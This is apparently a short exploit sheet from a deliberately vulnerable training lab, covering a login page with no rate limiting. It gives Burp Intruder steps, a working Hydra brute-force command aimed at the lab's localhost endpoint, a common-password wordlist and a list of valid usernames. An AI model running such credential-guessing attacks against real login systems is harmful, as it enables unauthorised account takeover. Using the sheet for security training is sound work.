๐ฏ Vulnerability Info
Type: Brute Force / No Rate Limiting
Severity: Medium
๐ก How to Exploit
- No protection against multiple login attempts
- Use automated tools to try many passwords
- Username enumeration reveals valid users
๐ง Burp Suite Intruder
- Capture login POST request
- Send to Intruder (Ctrl+I)
- Clear all positions, select password value
- Load password wordlist in Payloads
- Start Attack
- Look for different response length/status
๐งช Hydra Command
hydra -l admin -P /path/to/wordlist.txt \
localhost http-post-form \
"/vulnlab/vulnerabilities/brute-force/:username=^USER^&password=^PASS^:Invalid"
๐ Sample Wordlist
# Top passwords to try:
admin123
password
123456
password123
letmein
admin
user123
guest
qwerty123
welcome1
๐ Valid Users
- admin
- user
- john
- jane
- guest